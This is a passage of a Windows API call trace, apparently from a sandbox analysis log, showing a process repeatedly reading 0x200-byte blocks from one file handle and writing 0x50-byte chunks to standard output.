0x4c [0111.868] GetFileType (hFile=0x4c) returned 0x1 [0111.868] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.868] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceb7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.868] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.868] GetFileType (hFile=0x4c) returned 0x1 [0111.868] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.868] WriteFile (in: hFile=0x4c, lpBuffer=0x1cebcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cebcc*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.868] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.868] GetFileType (hFile=0x4c) returned 0x1 [0111.868] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.868] WriteFile (in: hFile=0x4c, lpBuffer=0x1cec1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cec1c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.868] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.868] GetFileType (hFile=0x4c) returned 0x1 [0111.868] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.868] WriteFile (in: hFile=0x4c, lpBuffer=0x1cec6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cec6c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.868] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.868] GetFileType (hFile=0x4c) returned 0x1 [0111.868] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.868] WriteFile (in: hFile=0x4c, lpBuffer=0x1cecbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cecbc*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.868] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.868] GetFileType (hFile=0x4c) returned 0x1 [0111.868] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.868] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ced0c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.868] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.868] GetFileType (hFile=0x4c) returned 0x1 [0111.868] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.868] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced5c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ced5c*, lpNumberOfBytesWritten=0x1cdd60*=0x20, lpOverlapped=0x0) returned 1 [0111.869] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.869] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdd4c | out: lpNewFilePointer=0x0) returned 1 [0111.869] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.869] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.869] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.869] GetFileType (hFile=0x4c) returned 0x1 [0111.869] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.869] GetFileType (hFile=0x4c) returned 0x1 [0111.869] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.869] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceb7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.869] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.869] GetFileType (hFile=0x4c) returned 0x1 [0111.869] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.869] WriteFile (in: hFile=0x4c, lpBuffer=0x1cebcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cebcc*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.869] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.869] GetFileType (hFile=0x4c) returned 0x1 [0111.869] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.869] WriteFile (in: hFile=0x4c, lpBuffer=0x1cec1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cec1c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.869] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.869] GetFileType (hFile=0x4c) returned 0x1 [0111.869] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.869] WriteFile (in: hFile=0x4c, lpBuffer=0x1cec6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cec6c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.869] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.869] GetFileType (hFile=0x4c) returned 0x1 [0111.869] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.869] WriteFile (in: hFile=0x4c, lpBuffer=0x1cecbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cecbc*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.869] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.869] GetFileType (hFile=0x4c) returned 0x1 [0111.869] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.869] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ced0c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.869] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.869] GetFileType (hFile=0x4c) returned 0x1 [0111.869] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.869] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced5c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ced5c*, lpNumberOfBytesWritten=0x1cdd60*=0x20, lpOverlapped=0x0) returned 1 [0111.869] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.870] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdd4c | out: lpNewFilePointer=0x0) returned 1 [0111.870] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.870] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.870] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.870] GetFileType (hFile=0x4c) returned 0x1 [0111.870] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.870] GetFileType (hFile=0x4c) returned 0x1 [0111.870] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.870] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceb7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.870] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.870] GetFileType (hFile=0x4c) returned 0x1 [0111.870] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.870] WriteFile (in: hFile=0x4c, lpBuffer=0x1cebcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cebcc*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.870] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.870] GetFileType (hFile=0x4c) returned 0x1 [0111.870] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.870] WriteFile (in: hFile=0x4c, lpBuffer=0x1cec1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cec1c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.870] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.870] GetFileType (hFile=0x4c) returned 0x1 [0111.870] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.870] WriteFile (in: hFile=0x4c, lpBuffer=0x1cec6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cec6c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.870] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.870] GetFileType (hFile=0x4c) returned 0x1 [0111.870] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.870] WriteFile (in: hFile=0x4c, lpBuffer=0x1cecbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cecbc*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.870] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.870] GetFileType (hFile=0x4c) returned 0x1 [0111.870] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.870] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ced0c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.870] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.870] GetFileType (hFile=0x4c) returned 0x1 [0111.870] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.870] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced5c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ced5c*, lpNumberOfBytesWritten=0x1cdd60*=0x20, lpOverlapped=0x0) returned 1 [0111.870] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.870] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdd4c | out: lpNewFilePointer=0x0) returned 1 [0111.871] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.871] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.871] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.871] GetFileType (hFile=0x4c) returned 0x1 [0111.871] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.871] GetFileType (hFile=0x4c) returned 0x1 [0111.871] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.871] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceb7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.871] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.871] GetFileType (hFile=0x4c) returned 0x1 [0111.871] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.871] WriteFile (in: hFile=0x4c, lpBuffer=0x1cebcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cebcc*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.871] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.871] GetFileType (hFile=0x4c) returned 0x1 [0111.871] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.871] WriteFile (in: hFile=0x4c, lpBuffer=0x1cec1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cec1c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.871] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.871] GetFileType (hFile=0x4c) returned 0x1 [0111.871] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.871] WriteFile (in: hFile=0x4c, lpBuffer=0x1cec6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cec6c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.871] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.871] GetFileType (hFile=0x4c) returned 0x1 [0111.871] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.871] WriteFile (in: hFile=0x4c, lpBuffer=0x1cecbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cecbc*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.871] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.871] GetFileType (hFile=0x4c) returned 0x1 [0111.871] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.871] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ced0c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.871] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.871] GetFileType (hFile=0x4c) returned 0x1 [0111.871] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.871] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced5c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ced5c*, lpNumberOfBytesWritten=0x1cdd60*=0x20, lpOverlapped=0x0) returned 1 [0111.871] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.871] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdd4c | out: lpNewFilePointer=0x0) returned 1 [0111.872] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.872] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.872] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.872] GetFileType (hFile=0x4c) returned 0x1 [0111.872] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.872] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.872] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.872] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.872] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.872] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.872] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.872] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.872] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.873] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.873] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.873] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.873] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.873] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.873] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.873] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.873] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.873] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.873] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.873] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.873] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.873] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.873] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.874] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.874] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.874] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.874] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.874] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.874] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.874] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.874] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.874] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.874] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.874] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.874] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.874] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.875] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.875] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.875] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.875] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.875] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.875] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.875] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.875] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, 